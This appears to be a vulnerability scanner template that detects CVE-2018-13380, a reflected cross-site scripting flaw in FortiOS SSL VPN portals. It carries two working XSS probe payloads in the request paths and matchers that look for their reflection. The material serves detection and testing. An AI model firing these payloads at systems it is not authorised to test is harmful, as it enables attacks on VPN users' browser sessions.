id: CVE-2018-13380

info:
  name: Fortinet FortiOS Cross-Site Scripting
  author: shelld3v,AaronChen0
  severity: medium
  description: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2018-13380
    - https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.10
    cve-id: CVE-2018-13380
    cwe-id: CWE-79
  tags: cve,cve2018,fortios,xss,fortinet

requests:
  - method: GET
    path:
      - "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B"
      - "{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<svg/onload=alert(1337)>"
          - "<script>alert(1337)</script>"
        condition: or

      - type: word
        part: header
        words:
          - "application/json"
        negative: true

      - type: status
        status:
          - 200